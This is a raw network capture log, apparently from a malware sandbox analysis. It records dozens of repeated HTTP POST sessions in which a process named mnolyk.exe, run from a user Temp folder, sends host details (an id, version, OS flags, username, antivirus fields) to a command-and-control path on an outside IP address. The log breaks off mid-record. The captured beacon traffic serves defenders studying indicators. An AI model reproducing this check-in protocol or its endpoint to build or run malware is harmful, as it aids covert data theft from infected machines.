                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:40.944602966 CET | 395 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:40 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        195 | 192.168.2.5 | 49885 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:41.119391918 CET | 396 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:41.185913086 CET | 396 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:41 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        196 | 192.168.2.5 | 49886 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:41.361243010 CET | 397 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:41.423928976 CET | 397 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:41 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        197 | 192.168.2.5 | 49887 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:41.597625017 CET | 398 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:41.661936045 CET | 398 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:41 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        198 | 192.168.2.5 | 49888 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:41.840854883 CET | 399 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:41.906905890 CET | 399 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:41 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        199 | 192.168.2.5 | 49889 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:42.087363005 CET | 400 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:42.156582117 CET | 400 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:42 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        2 | 192.168.2.5 | 49692 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:29.077816010 CET | 147 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:29.144706964 CET | 201 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:29 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        20 | 192.168.2.5 | 49710 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:33.533909082 CET | 220 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:33.601789951 CET | 221 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:33 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        200 | 192.168.2.5 | 49890 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:42.348321915 CET | 401 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:42.415592909 CET | 401 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:42 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        201 | 192.168.2.5 | 49891 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:42.583952904 CET | 402 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:42.649425030 CET | 402 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:42 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        202 | 192.168.2.5 | 49892 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:42.833784103 CET | 403 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:42.900185108 CET | 403 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:42 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        203 | 192.168.2.5 | 49893 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:43.066540003 CET | 404 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:43.134987116 CET | 404 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:43 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        204 | 192.168.2.5 | 49894 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:43.316977024 CET | 405 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:43.380888939 CET | 405 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:43 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        205 | 192.168.2.5 | 49895 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:43.567435026 CET | 406 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:43.633063078 CET | 406 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:43 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        206 | 192.168.2.5 | 49896 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:43.821532965 CET | 407 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:43.887778044 CET | 407 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:43 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        207 | 192.168.2.5 | 49897 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:44.164540052 CET | 408 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:44.234129906 CET | 408 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:44 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        208 | 192.168.2.5 | 49898 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:44.411726952 CET | 409 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:44.476085901 CET | 409 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:44 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        209 | 192.168.2.5 | 49899 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:44.645814896 CET | 410 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:44.710201979 CET | 410 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:44 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        21 | 192.168.2.5 | 49711 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:33.781092882 CET | 221 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:33.843689919 CET | 222 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:33 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        210 | 192.168.2.5 | 49900 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:44.895342112 CET | 411 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
